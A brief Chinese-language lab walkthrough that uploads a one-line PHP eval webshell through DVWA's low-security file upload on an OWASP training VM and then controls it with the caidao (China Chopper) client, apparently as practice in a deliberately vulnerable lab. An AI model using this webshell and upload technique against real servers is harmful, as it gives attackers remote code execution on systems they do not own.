工具:owasp虚拟机、caidao、win7 x86系统虚拟机。
环境准备:
下载owasp用VMare打开;(靶机)
win7上下载安装caidao。(攻击机)
- 在win7上创建一个1.php文件内容为一句话木马:
<?php @eval($_POST[‘cmd’]);?>
【这是webshell ,网页后门】 - 打开owasp虚拟机,获得IP。
- 然后在win7上访问此IP,点击DVWA靶场,选择文件上传(low等级),将1.php上传,复制下面上传成功的路径,将网址处#号替换成此路径,进行1.php文件访问(看是否上传成功),将网址全部复制【后面会用到】。
- 打开caidao,鼠标右键点击首页空白处,选添加,将上面复制的(URL)网址粘贴进http输入框,后面小框是口令输入cmd(POST后面的参数),点击确认。
- 添加成功后,点击相应网页条目即可。
- 查看文件。
owasp下载连接
链接:https://pan.baidu.com/s/1DXlV2HmexQABjIwMqXn7lA
提取码:7jnq